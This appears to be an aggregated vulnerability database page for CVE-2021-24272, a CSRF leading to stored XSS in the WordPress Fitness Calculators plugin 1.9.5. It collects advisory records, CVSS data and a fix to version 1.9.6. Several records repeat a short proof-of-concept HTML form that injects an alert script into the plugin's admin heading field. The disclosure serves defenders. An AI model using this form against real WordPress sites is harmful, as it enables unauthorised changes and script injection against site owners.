WordPress Fitness Calculators 1.9.5 Plugin - Cross-Site Request Forgery Vulnerability

2021-09-23T00:00:00

Description

{"id": "1337DAY-ID-36795", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress Fitness Calculators 1.9.5 Plugin - Cross-Site Request Forgery Vulnerability", "description": "", "published": "2021-09-23T00:00:00", "modified": "2021-09-23T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://0day.today/exploit/description/36795", "reporter": "0xB9", "references": [], "cvelist": ["CVE-2021-24272"], "immutableFields": [], "lastseen": "2021-12-04T15:50:23", "viewCount": 68, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24272"]}, {"type": "exploitdb", "idList": ["EDB-ID:50325"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164261"]}, {"type": "patchstack", "idList": ["PATCHSTACK:D86DD962E94B5A6A242FCC273B53A5A4"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E643040B-1F3B-4C13-8A20-ACFD069DCC4F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E643040B-1F3B-4C13-8A20-ACFD069DCC4F"]}]}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24272"]}, {"type": "exploitdb", "idList": ["EDB-ID:50325"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164261"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E643040B-1F3B-4C13-8A20-ACFD069DCC4F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E643040B-1F3B-4C13-8A20-ACFD069DCC4F"]}]}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://0day.today/exploit/36795", "sourceData": "# Exploit Title: WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)\n# Author: 0xB9\n# Software Link: https://wordpress.org/plugins/fitness-calculators/\n# Version: 1.9.5\n# Tested on: Windows 10\n# CVE: CVE-2021-24272\n\n1. Description:\nThe plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. \nDue to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue\n\n2. Proof of Concept:\n\n<form method=\"post\" action=\"https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water\">\n <input type=\"text\" value=\"<script>alert(1)</script>\" name=\"fcw[fcw_heading]\">\n <input type=\"submit\" value=\"Save\" name=\"submit\">\n</form>\n", "category": "web applications", "verified": true, "_state": {"dependencies": 1660004461, "score": 1660007784}, "_internal": {"score_hash": "d0e9fce5859e6de192131f800a275946"}}

{"cve": [{"lastseen": "2022-03-23T14:50:43", "description": "The fitness calculators WordPress plugin before 1.9.6 add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2021-05-05T19:15:00", "type": "cve", "title": "CVE-2021-24272", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24272"], "modified": "2021-12-03T19:59:00", "cpe": [], "id": "CVE-2021-24272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24272", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "patchstack": [{"lastseen": "2022-06-01T19:32:39", "description": "Cross-Site Request Forgery (CSRF) leading to Cross-Site Scripting (XSS) vulnerability discovered by 0xB9 in WordPress fitness calculators plugin (versions <= 1.9.5).\n\n## Solution\n\n\r\n Update the WordPress fitness calculators plugin to the latest available version (at least 1.9.6).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2021-04-14T00:00:00", "type": "patchstack", "title": "WordPress fitness calculators plugin <= 1.9.5 - Cross-Site Request Forgery (CSRF) leading to Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24272"], "modified": "2021-04-14T00:00:00", "id": "PATCHSTACK:D86DD962E94B5A6A242FCC273B53A5A4", "href": "https://patchstack.com/database/vulnerability/fitness-calculators/wordpress-fitness-calculators-plugin-1-9-5-cross-site-request-forgery-csrf-leading-to-cross-site-scripting-xss-vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2021-05-12T03:38:42", "description": "The plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue\n\n### PoC\n", "cvss3": {}, "published": "2021-04-14T00:00:00", "type": "wpvulndb", "title": "Fitness Calculators < 1.9.6 - Cross-Site Request Forgery to Cross-Site Scripting (XSS)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24272"], "modified": "2021-04-16T07:02:57", "id": "WPVDB-ID:E643040B-1F3B-4C13-8A20-ACFD069DCC4F", "href": "https://wpscan.com/vulnerability/e643040b-1f3b-4c13-8a20-acfd069dcc4f", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2021-09-23T15:45:52", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-09-23T00:00:00", "type": "packetstorm", "title": "WordPress Fitness Calculators 1.9.5 Cross Site Request Forgery", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24272"], "modified": "2021-09-23T00:00:00", "id": "PACKETSTORM:164261", "href": "https://packetstormsecurity.com/files/164261/WordPress-Fitness-Calculators-1.9.5-Cross-Site-Request-Forgery.html", "sourceData": "`# Exploit Title: WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF) \n# Date: 2/28/2021 \n# Author: 0xB9 \n# Software Link: https://wordpress.org/plugins/fitness-calculators/ \n# Version: 1.9.5 \n# Tested on: Windows 10 \n# CVE: CVE-2021-24272 \n \n1. Description: \nThe plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. \nDue to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue \n \n2. Proof of Concept: \n \n<form method=\"post\" action=\"https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water\"> \n<input type=\"text\" value=\"<script>alert(1)</script>\" name=\"fcw[fcw_heading]\"> \n<input type=\"submit\" value=\"Save\" name=\"submit\"> \n</form> \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164261/wpfitnesscalaculators195-xsrf.txt", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpexploit": [{"lastseen": "2021-05-12T03:38:42", "description": "The plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue\n", "cvss3": {}, "published": "2021-04-14T00:00:00", "type": "wpexploit", "title": "Fitness Calculators < 1.9.6 - Cross-Site Request Forgery to Cross-Site Scripting (XSS)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24272"], "modified": "2021-04-16T07:02:57", "id": "WPEX-ID:E643040B-1F3B-4C13-8A20-ACFD069DCC4F", "href": "", "sourceData": "<form method=\"post\" action=\"https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water\">\r\n <input type=\"text\" value=\"<script>alert(1)</script>\" name=\"fcw[fcw_heading]\">\r\n <input type=\"submit\" value=\"Save\" name=\"submit\">\r\n</form>", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2022-08-16T06:04:11", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2021-09-23T00:00:00", "type": "exploitdb", "title": "WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-24272", "CVE-2021-24272"], "modified": "2021-09-23T00:00:00", "id": "EDB-ID:50325", "href": "https://www.exploit-db.com/exploits/50325", "sourceData": "# Exploit Title: WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)\r\n# Date: 2/28/2021\r\n# Author: 0xB9\r\n# Software Link: https://wordpress.org/plugins/fitness-calculators/\r\n# Version: 1.9.5\r\n# Tested on: Windows 10\r\n# CVE: CVE-2021-24272\r\n\r\n1. Description:\r\nThe plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. \r\nDue to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue\r\n\r\n2. Proof of Concept:\r\n\r\n<form method=\"post\" action=\"https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water\">\r\n <input type=\"text\" value=\"<script>alert(1)</script>\" name=\"fcw[fcw_heading]\">\r\n <input type=\"submit\" value=\"Save\" name=\"submit\">\r\n</form>", "sourceHref": "https://www.exploit-db.com/download/50325", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}

WordPress Fitness Calculators 1.9.5 Plugin - Cross-Site Request Forgery Vulnerability

Description

Related